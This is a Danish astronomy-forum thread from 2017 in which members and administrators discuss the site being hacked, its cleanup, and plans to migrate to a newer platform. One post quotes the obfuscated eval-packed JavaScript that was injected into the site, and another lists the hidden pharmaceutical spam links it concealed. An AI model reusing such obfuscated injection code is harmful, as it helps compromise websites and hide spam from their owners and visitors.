What? – Astro-Forum

Dette emne har 33 svar og 9 stemmer, og blev senest opdateret for 6 år, 10 måneder siden af Torben Taustrup. This post has been viewed 794 times

Viser 15 indlæg - 1 til 15 (af 34 i alt)

1 2 3 →

Forfatter

Indlæg
20. april 2017 kl. 17:15 #159690
Rudi
Deltager
- Neutron star
Admin (TT), hvad er det her for noget?

/Rudi B. Rasmussen
20. april 2017 kl. 17:41 #159691
nightsky
Deltager
- Neutron star
Snavs kan bekræftes.

Hvad med scriptet som er hæftet sammen div. tror man skal holde sig forum indtil videre.

<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?””:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’w+’};c=1;};while(c–)if(k[c])p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c]);return p;}(‘s 7$=[“eghnd689″,”o69mb6d689lcke”,”96j8afc68b6iadap”,”f9cb6″,”eafrbtc”,8g86];q[7$[0]][7$[1]](7$[2])[7$[3]][7$[4]]=7$[5]’,30,30,’||||||x65|_|x6e|x74|x69|x6c|x79|x6d|x64|x73|x6f|x63|x72|x6b|x49|x42|x45|x75|x67|x7a|window|x70|var|x61′.split(‘|’),0,{}))
</script>
20. april 2017 kl. 17:44 #159692
nightsky
Deltager
- Neutron star
Hvis man bloker for javascript på astro-forum ser man dette.

kamagra online uk
levitra online uk
buy cialis london
cialis pills for sale uk
viagra tablets uk
viagra for sale uk
buy kamagra uk
nuovo cialis
levitra controindicazioni
kamagra forum
kamagra 100 mg pillole
cialis lilly prezzo
levitra generico prezzo
viagra rosa
cialis new zealand
kamagra gel nz
cialis pills nz
buy levitra nz
viagra online nz
viagra for sale nz

Hermed helt sikkert slut herfra indtil det er løst. Der kører potentielt skadelige ting på sitet.

Nightsky2017-04-20 17:45:32
20. april 2017 kl. 18:32 #159693
Lars Malmgren
Deltager
- Super Nova
Bekræftet herfra også.

A-F er blevet hacket på et tidspunkt, hvor der er blevet tilføjet skjult kode.
Dette ser ud til at være links til web-sites, som skal forbedre disse web-sites placering i google-søgninger.

Problemet er bare, at når A-F er blevet kompromitteret, så kan hackerne også tilføje skadelig kode efter forgodtbefindende.

Så det er altså bydende vigtigt, at der sættes i sag i gang ved den hosting-leverandør, som Astronomisk Selskab har aftale med.
21. april 2017 kl. 16:47 #159731
Rudi
Deltager
- Neutron star
Jeg skal ikke kloge mig på hvad det skyldtes – måske mener Admin at vi trænger til noget viagra

Jeg observerede blot alle disse mystiske links da jeg lige på vej hjem fra Malmö ville checke astro-forum.dk og toget drønede i røret under bæltet, siden blev kun delvist læst ind så derfor så jeg linksene.

/Rudi B. Rasmussen
21. april 2017 kl. 17:29 #159732
Torben Taustrup
Admin
- Neutron star
Hej folkens

Lars var så venlig at gøre mig opmærksom på problemet i går, og jeg har

været i gang med at indkredse fejlen.

Fandt den inficerede fil med de mange links, og de skulle nu være fjernet.

Jeg har taget kontakt til vores udbyder, men har endnu ikke fået svar.

Den tidligere administrator, Jeppe har også været aktiv, og har fundet

en fil, som vi ikke umiddelbart kan redigere i.

Denne fil vil vi forsøge at sætte i karantæne, og så håber jeg, at vi

er ovre problemerne.

Hvordan vores site er blevet inficeret forbliver et mysterium.

Jeg vender tilbage, når der er nyt.

mvh

Torben

[ADM]

TOC Observatory - "http://tocobs.org -14.5″ – f:4,2 Newt - Atik383 - ZWO2600-mono – SXV H9 - QHY8L-color - SkyWatcher 80 mm ED refraktor - 60 mm F:6 apocromat - TAL Apolar 125 f : 7,5.
21. april 2017 kl. 17:40 #159734
Torben Taustrup
Admin
- Neutron star
I fortsættelse af ovenstående, vil jeg opfordre alle, som er

interesserede i at modtage information, hvis Astro-Forum skulle gå

ned til at tilmelde sig Astrolist, som er et mailbaseret forum.

Astrolist har eksisteret i mange år.

Vejledning

Tilmelding til Astrolist:

Send en e-mail til astrolist-request@freelists.org

I emnefeltet skrives: subscribe astrolist

eller tilmeld dig her:

http://www.freelists.org/list/astrolist

Afmelding af Astrolist:

Send en e-mail til astrolist-request@freelists.org

I emnefeltet skrives: unsubscribe astrolist

Tilmelding til Digest

http://www.freelists.org/list/astrolist

Indlæg:

Indlæg sendes til astrolist@freelists.org

Arkiv:

Indeks over arkivet – http://www.freelists.org/archive/astrolist/

*Kun* indlæg afsendt fra en email-adresse der er tilmeldt listen videresendes.

mvh

Torben

TOC Observatory - "http://tocobs.org -14.5″ – f:4,2 Newt - Atik383 - ZWO2600-mono – SXV H9 - QHY8L-color - SkyWatcher 80 mm ED refraktor - 60 mm F:6 apocromat - TAL Apolar 125 f : 7,5.
21. april 2017 kl. 20:35 #159735
Bjarne
Moderator
- Super Nova
Der er vel ikke nogen, som har anvendt punycode tricket til at lokke
passwords fra en bruger?
https://www.wordfence.com/blog/2017/04/chrome-firefox-unicode-phishing/

Jeg ved ikke, hvor kendt metoden er. Torben, er det kun dig, som kan rette i filen?
Hvordan er det sket? Har nogen høstet alle passwords?
22. april 2017 kl. 08:57 #159745
Torben Taustrup
Admin
- Neutron star
Hej Bjarne

Jeg er desværre ikke i stand til at svare, da jeg ikke har tilstrækkelig

indsigt i, hvordan programmet virker.

Som jeg tidligere har skrevet, har Jeppe, den tidligere administrator og

også Søren fra bestyrelsen adgang til programfilerne.

Hvordan andre har tiltusket sig adgang, ved jeg ikke, men det er bekym-

rende, at det tilsyneladende kan lade sig gøre.

Jeppe mener, at man har skaffet sig adgang via uploadfunktionen. Jeg kan

ikke gennemskue, hvordan det er muligt, da uploads kun har adgang til

én mappe i forum.

mvh

Torben

TOC Observatory - "http://tocobs.org -14.5″ – f:4,2 Newt - Atik383 - ZWO2600-mono – SXV H9 - QHY8L-color - SkyWatcher 80 mm ED refraktor - 60 mm F:6 apocromat - TAL Apolar 125 f : 7,5.
22. april 2017 kl. 09:40 #159746
nightsky
Deltager
- Neutron star
Hejsa

Hvis man ikke ved hvordan man fået adgang, så kan man heller ikke sige at astro-forum er sikkert. Man har jo ikke lukket hullet ved at slette filerne.

Har Jeppe identificeret sikkerhedshullet og fået det lukket?

Man bør lukke astro-forum indtil hullet er fundet og lukket. Det er totalt useriøst bare at blive ved fordi man ikke kan finde ud af det.

Det kan Astronimsk Selskab iforhåbentlig ikke acceptere.

Alle brugernes passwords bør tvinges til ændring, det samme med diverse admin konti. Hosting firmaet skal på banen.

Er vores brugernavne, passwords, e-mail adresser mv stjålet fra databasen? Nightsky2017-04-22 10:03:43
22. april 2017 kl. 10:51 #159748
Bjarne
Moderator
- Super Nova
Jeg tror, at det er håbløst at vedligeholde et så gammelt system.
Det er velkendt, at der hele tiden findes huller i WordPress og lignende systemer.
Det er derfor afgørene, at der sker en automatisk opdatering af systemet.
Dette var grunden til, at jeg flyttede mine indlæg til min egen SSL/TLS server med
WordPress, som nu automatisk opdateres uden min indgriben.

Hvordan går det med planerne med en afløser?
Det bliver vanskeligt, hvis alle de gamle indlæg fra astro-forum skal overføres
til det nye system…
22. april 2017 kl. 10:51 #159749
Torben Taustrup
Admin
- Neutron star
Hej Lars

Fik du tjekket forum for snavs i går ?

Søren har lige tjekket, og der er ingen røde lamper der blinker.

Mvh

Torben

TOC Observatory - "http://tocobs.org -14.5″ – f:4,2 Newt - Atik383 - ZWO2600-mono – SXV H9 - QHY8L-color - SkyWatcher 80 mm ED refraktor - 60 mm F:6 apocromat - TAL Apolar 125 f : 7,5.
22. april 2017 kl. 12:38 #159752
xplode
Deltager
- Nova
BjarneT wrote: Jeg tror, at det er håbløst at vedligeholde et så gammelt system.Det er velkendt, at der hele tiden findes huller i WordPress og lignende systemer.Det er derfor afgørene, at der sker en automatisk opdatering af systemet.Dette var grunden til, at jeg flyttede mine indlæg til min egen SSL/TLS server medWordPress, som nu automatisk opdateres uden min indgriben.Hvordan går det med planerne med en afløser?Det bliver vanskeligt, hvis alle de gamle indlæg fra astro-forum skal overførestil det nye system…

Jeg er helt enig i att det er håpløst med ett så gammelt system på forumet, forumprogramvaren ble oppdatert for sånn ca 10 år siden og er full av sikkerhetshull

Ett nytt forum vil i tillegg til bedre sikkerhet også være mye lettere i bruk, f. eks så sliter mange med å poste linker her og bilder opplastet til forumet får veldig dårlig kvalitet.

Det er så absolutt på tide med en oppgradering og jo før jo bedre!

Det gamle forumet burde fortsatt være tilgjengelig for lesing så ikke informasjon går tapt og filene kan låses for skriving så da er det ikke lenger mulig å utnytte sikkerhetshull.

Nå er det snart slutt på sesongen så da burde det være perfekt å starte oppgradering av forumet?
22. april 2017 kl. 12:53 #159753
Søren K. Lynggaard
Admin
- Asteroid
Det aktuelle problem er nu løst, idet der ikke længere laves kald til ukendte websider.

Astro-forum.dk nærmer sig – teknisk set – pensionsalderen, og derfor arbejder Astronomisk Selskab sammen med en programmør på at flytte sitet til en moderne platform, der bl.a. også understøtter mobiltelefoner.

/Søren Lynggaard
22. april 2017 kl. 13:32 #159754
nightsky
Deltager
- Neutron star
Kan man ikke få et klart svar?

Er sikkerhedshullet lukket eller har i blot fjernet symptomerne.

At fjerne de ramte filer hjælper ikke hvis der blot kan komme nye.
Forfatter

Indlæg